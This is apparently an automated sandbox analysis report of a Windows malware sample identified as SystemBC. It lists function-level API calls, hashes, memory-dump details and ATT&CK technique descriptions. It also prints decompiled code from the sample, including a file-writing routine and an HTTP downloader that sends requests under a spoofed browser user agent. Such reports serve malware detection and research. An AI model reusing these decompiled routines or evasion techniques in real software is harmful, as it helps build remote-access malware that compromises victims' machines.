Opcode ID: ecc68a0251e122bc8051bfa61ecfa5384c210e50f1ef1634e58e52fde3da91e0
Instruction ID: 4e51c326d5c9859d893db93e30150920626005a34d4dbe5b92046b7965cdbbad
Opcode Fuzzy Hash: ecc68a0251e122bc8051bfa61ecfa5384c210e50f1ef1634e58e52fde3da91e0
Instruction Fuzzy Hash: DA111C71D00129FADF11EBD4ED06FEEBBBABF44700F104569B210B50A2DB799B14AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00721281, Relevance: 9.1, APIs: 6, Instructions: 56sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,004026A1,004027BF,00000000,00000000), ref: 007212AC
OpenMutexA.KERNEL32(00100000,00000000,0040510B), ref: 007212BD
CreateMutexA.KERNEL32(00000000,00000000,0040510B,00100000,00000000,0040510B,00000000,00000000,004026A1,004027BF,00000000,00000000,?,?,?,00000000), ref: 007212D1
EnumWindows.USER32(00402487,00000000), ref: 007212F9
GetModuleFileNameA.KERNEL32(00000000,?,00000100,00402487,00000000,00405111,00000000,00000000,0040510B,00100000,00000000,0040510B,00000000,00000000,004026A1,004027BF), ref: 00721318
Sleep.KERNEL32(0000EA60,0040510B,00000000,?,00405111,00000000,00000001,00000000,?,00000100,00402487,00000000,00402487,00000000,00405111,00000000), ref: 0072133E

Part of subcall function 00721799: Sleep.KERNEL32(0002BF20,?,?,?,00405076,000000FF,?,00000202,?,00002710,?), ref: 0072183E

Memory Dump Source

Source File: 00000005.00000002.516276984.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

Similarity

API ID: CreateMutexSleep$EnumFileModuleNameOpenThreadWindows
String ID:
API String ID: 3866134860-0
Opcode ID: 46e758ca8e1888c96091b89d1b5283f4c94d6fb4f8bbddfd54f4e5bf370d84cc
Instruction ID: 2a50c5b8662001a9ebb35b91448ab7326a4a1e7b028d86628cd7312618204d2a
Opcode Fuzzy Hash: 46e758ca8e1888c96091b89d1b5283f4c94d6fb4f8bbddfd54f4e5bf370d84cc
Instruction Fuzzy Hash: 2C0152707C0728F6EA61B6A09D4BF5E6198BB14F01F640466B744B90C2D9FCA640897E

Uniqueness

Uniqueness Score: -1.00%

Function 007222F8, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 239timeCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0072232C

Part of subcall function 00722ACE: LocalFree.KERNEL32(?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00722B2A
Part of subcall function 00722ACE: LocalAlloc.KERNEL32(00000000,?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00722B34
Part of subcall function 00722ACE: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,00000019,?,?,?,00000000,?,00000000), ref: 00722B4B
Part of subcall function 00722ACE: GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,?,?,00000019,?,?,?,00000000), ref: 00722B5B
Part of subcall function 00722ACE: LocalFree.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00722B73
Part of subcall function 00722ACE: CloseHandle.KERNEL32(?,?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008), ref: 00722B7B

GetLocalTime.KERNEL32(?,?,00000030,?,007220EA,?,00000014,?,00000000,00000001,00000000,00000018,?,?,?,00000002), ref: 007224C1
SystemTimeToFileTime.KERNEL32(?,?,?,?,00000030,?,007220EA,?,00000014,?,00000000,00000001,00000000,00000018,?,?), ref: 007224D4
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00000030,?,007220EA,?,00000014,?,00000000,00000001,00000000,00000018), ref: 00722505

Strings

0, xrefs: 00722524

Memory Dump Source

Source File: 00000005.00000002.516276984.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

Similarity

API ID: Time$Local$FileFreeSystem$AllocAuthorityCloseHandleInformationInitializeToken
String ID: 0
API String ID: 1744783010-4108050209
Opcode ID: 73d2a32ad973e6507444423bd463984556881c0eee01d0562af38525a1824e78
Instruction ID: ef18bd46d8cb1085753ddad71da7c83af6de8ad49587dd8b32c9946ba4d0d7e0
Opcode Fuzzy Hash: 73d2a32ad973e6507444423bd463984556881c0eee01d0562af38525a1824e78
Instruction Fuzzy Hash: 1EA1D9B5900628AFDB10EB94DC85FDAB3BCEF48304F1040D5E609E7252D679AE86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00402DC6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DC6(CHAR* _a4, void* _a8, long _a12, long _a16, long _a20) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				void* _t16;

				_v16 = 0x64;
				while(1) {
					_t16 = CreateFileA(_a4, 0x40000000, 0, 0, _a16, 0x80, 0);
					_v8 = _t16;
					if(_t16 != 0xffffffff || _v16 == 0) {
						break;
					}
					_v16 = _v16 - 1;
				}
				if(_v8 != 0xffffffff) {
					SetFilePointer(_v8, 0, 0, _a20);
					WriteFile(_v8, _a8, _a12,  &_v12, 0);
					return CloseHandle(_v8);
				}
				return _t16;
			}

0x00402dcf
0x00402dd6
0x00402dec
0x00402df1
0x00402df7
0x00000000
0x00000000
0x00402dff
0x00402dff
0x00402e08
0x00402e14
0x00402e28
0x00000000
0x00402e30
0x00402e39

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,?,00000003), ref: 00402DEC
SetFilePointer.KERNEL32(?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080,00000000,?,?,00000003), ref: 00402E14
WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080,00000000), ref: 00402E28
CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080), ref: 00402E30

Strings

d, xrefs: 00402DCF

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID: d
API String ID: 3604237281-2564639436
Opcode ID: b48929ffc05c4d8dbf09a504efa7211444ddbe2eebdd9ec3fe2fc56b531eaf58
Instruction ID: 9f02c6c91d55e6c91743ec0969cdaa1df374496b200545e5b565d8914b63410a
Opcode Fuzzy Hash: b48929ffc05c4d8dbf09a504efa7211444ddbe2eebdd9ec3fe2fc56b531eaf58
Instruction Fuzzy Hash: EA016231940208FADF219F95CD4AFCE7B39AB05764F204266B720741E0D7B55E61EB98

Uniqueness

Uniqueness Score: -1.00%

Function 00721349, Relevance: 7.6, APIs: 5, Instructions: 90networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00000000), ref: 007213D3
ioctlsocket.WS2_32(?,8004667E,?), ref: 007213FB
connect.WS2_32(?,?,00000010), ref: 00721409
select.WS2_32(00000000,00000000,?,00000000,?), ref: 0072142F
ioctlsocket.WS2_32(?,8004667E,?), ref: 00721452

Memory Dump Source

Source File: 00000005.00000002.516276984.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

Similarity

API ID: ioctlsocket$connecthtonsselect
String ID:
API String ID: 3844996356-0
Opcode ID: 2256ee2706dcf72c894a44fc722725e338eaf0a637b17f15df246a49cf4cb852
Instruction ID: 2827df331cc297a6fe035b6e12ed742a722ab3517b29b401ec3cd16851d83a7e
Opcode Fuzzy Hash: 2256ee2706dcf72c894a44fc722725e338eaf0a637b17f15df246a49cf4cb852
Instruction Fuzzy Hash: 28311C71A0022CFADF10EBA0DC4AFDEB7BDEB08714F104095F604B6091D7B99B559B65

Uniqueness

Uniqueness Score: -1.00%

Function 00401351, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00401351(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v16;
				char _v1072;
				char _v1076;
				char _v1080;
				char _v1084;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __eflags;
				E00402BA3( &_v1084,  &_v16 - _t59);
				E0040151C(_a16);
				if(E004010F9(__edx, _t61,  &_v8, _a4, _a8, 0xa) != 0) {
					_t40 = E00402997(_v8,  &_v1072, wsprintfA( &_v1072, "GET %s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\r\nConnection: close\r\n\r\n", _a12, _a4), 0);
					_t58 = 0;
					while(_t58 <= 0x400) {
						_t13 =  &_v1072; // -1068
						_t40 = E00402A1E(__eflags, _v8, _t58 + _t13, 1, 0xa);
						__eflags = _t40 - 1;
						if(_t40 == 1) {
							_t58 = _t58 + 1;
							__eflags = _t58 - 4;
							if(__eflags < 0) {
								continue;
							} else {
								__eflags =  *[ss:edi+ebp-0x430] - 0xa0d0a0d;
								if(__eflags != 0) {
									continue;
								} else {
									while(1) {
										_t15 =  &_v1076; // 0xa0d0a0d
										_push(0x4004667f);
										_push(_v8);
										L00403090();
										__eflags = _v1076;
										if(_v1076 == 0) {
											_v1076 = 0x1000;
										}
										_t40 = E004014B3( &_v1080, _v1084, _v1076 + _v1084);
										__eflags = _t40;
										if(_t40 == 0) {
											goto L14;
										}
										while(1) {
											__eflags = _v1076;
											if(__eflags == 0) {
												break;
											}
											_t40 = E00402A1E(__eflags, _v8, _v1080 + _v1084, _v1076, 0xa);
											__eflags = _t40;
											if(_t40 > 0) {
												_v1084 = _v1084 + _t40;
												_t29 =  &_v1076;
												 *_t29 = _v1076 - _t40;
												__eflags =  *_t29;
												continue;
											}
											goto L14;
										}
									}
								}
							}
						}
						goto L14;
					}
				}
				L14:
				E00402A71(_t40, _v8);
				E00402B1C( &_v1080, _a16, 4);
				return _v1084;
			}

APIs

Part of subcall function 0040151C: VirtualFree.KERNEL32(?,00000000,00008000,?,?,000000C7,?,00402078,?,?,?,00000000,00010000,00003000,00000004,00000000), ref: 00401533

Part of subcall function 004010F9: socket.WSOCK32(00000002,00000001,00000006,?,?,?,?), ref: 0040111B
Part of subcall function 004010F9: setsockopt.WSOCK32(?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001,00000006,?,?,?,?), ref: 0040114B
Part of subcall function 004010F9: htons.WSOCK32(?,?,00000002,?,000000FF,?,?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001), ref: 00401183
Part of subcall function 004010F9: ioctlsocket.WSOCK32(?,8004667E,?,?,?,00000002,?,000000FF,?,?,00000006,00000001,?,00000004,?,?), ref: 004011AB
Part of subcall function 004010F9: connect.WSOCK32(?,?,00000010,?,8004667E,?,?,?,00000002,?,000000FF,?,?,00000006,00000001,?), ref: 004011B9
Part of subcall function 004010F9: select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010,?,8004667E,?), ref: 004011DF
Part of subcall function 004010F9: ioctlsocket.WSOCK32(?,8004667E,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010), ref: 00401202

wsprintfA.USER32 ref: 004013A0

Part of subcall function 00402997: WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 004029B2
Part of subcall function 00402997: SetEvent.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?), ref: 00402A0F

ioctlsocket.WSOCK32(?,4004667F,), ref: 00401409

Strings

GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close, xrefs: 00401394
, xrefs: 004013FA, 00401400

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ioctlsocket$EventFreeObjectSingleVirtualWaitconnecthtonsselectsetsockoptsocketwsprintf
String ID: $GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
API String ID: 3096608166-2676332027
Opcode ID: c861de531235c7084ea78be7fce6cefa398647138f99206c169987c40781cd37
Instruction ID: 434c8e4364e880c9d98e857f0535121a821500db1cdf89a4e2bee5d2e916f05a
Opcode Fuzzy Hash: c861de531235c7084ea78be7fce6cefa398647138f99206c169987c40781cd37
Instruction Fuzzy Hash: B6313FB1900118AADF219EA5CD85FDE7778AB44318F4011A6FA04B20E1D7799B94DF1D

Uniqueness

Uniqueness Score: -1.00%

Function 00723016, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,40000000,00000000,00000000,?,00000080,00000000,?,?), ref: 0072303C
CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080), ref: 00723080

Strings

d, xrefs: 0072301F

Memory Dump Source

Source File: 00000005.00000002.516276984.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

Similarity

API ID: CloseCreateFileHandle
String ID: d
API String ID: 3498533004-2564639436
Opcode ID: b48929ffc05c4d8dbf09a504efa7211444ddbe2eebdd9ec3fe2fc56b531eaf58
Instruction ID: bf54233efcc3c31c869dfa094511ec474fe21b53c04151530761c74a4fdefd08
Opcode Fuzzy Hash: b48929ffc05c4d8dbf09a504efa7211444ddbe2eebdd9ec3fe2fc56b531eaf58
Instruction Fuzzy Hash: BC01E431A00218FADF219F94EC0AFDEBA76AB05724F204265B620740E0D7B95B64AB64

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ZDqKJkJ1Sb

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: SystemBC

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Boot Survival:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Function 004020A8, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239
timecomCOMMON

Function 004023E6, Relevance: 4.6, APIs: 3, Instructions: 57
comCOMMON

Function 004026A1, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 78
windowregistryCOMMON

Function 0040287E, Relevance: 15.1, APIs: 10, Instructions: 66
memoryCOMMON

Function 00401031, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56
sleepsynchronizationthreadCOMMON

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Function 00402A1E, Relevance: 3.0, APIs: 2, Instructions: 36
networkCOMMON

Function 00402E3C, Relevance: 2.6, Strings: 2, Instructions: 81
COMMON

Function 00402D95, Relevance: .0, Instructions: 25
COMMON

Function 0040197F, Relevance: 35.5, APIs: 15, Strings: 5, Instructions: 494
memorynetworkthreadCOMMON

Function 00402487, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 91
sleepfilethreadCOMMON

Function 004015FC, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 276
networkCOMMON

Function 004010F9, Relevance: 10.6, APIs: 7, Instructions: 90
networkCOMMON

Function 00401549, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41
sleepnetworkCOMMON

Function 00402DC6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
fileCOMMON

Function 00401351, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
COMMON

Function 00402997, Relevance: 6.1, APIs: 4, Instructions: 53
synchronizationnetworkCOMMON

Function 0040197F, Relevance: 35.5, APIs: 15, Strings: 5, Instructions: 494
memorynetworkthreadCOMMON

Function 004026A1, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 78
windowregistryCOMMON

Function 00401000, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 68
COMMON

Function 0040287E, Relevance: 15.1, APIs: 10, Instructions: 66
memoryCOMMON

Function 00401031, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56
sleepsynchronizationthreadCOMMON

Function 004010F9, Relevance: 10.6, APIs: 7, Instructions: 90
networkCOMMON

Function 00401549, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41
sleepnetworkCOMMON

Function 00402997, Relevance: 6.1, APIs: 4, Instructions: 53
synchronizationnetworkCOMMON

Function 00402487, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 91
sleepfilethreadCOMMON

Function 004015FC, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 276
networkCOMMON

Function 004020A8, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239
timecomCOMMON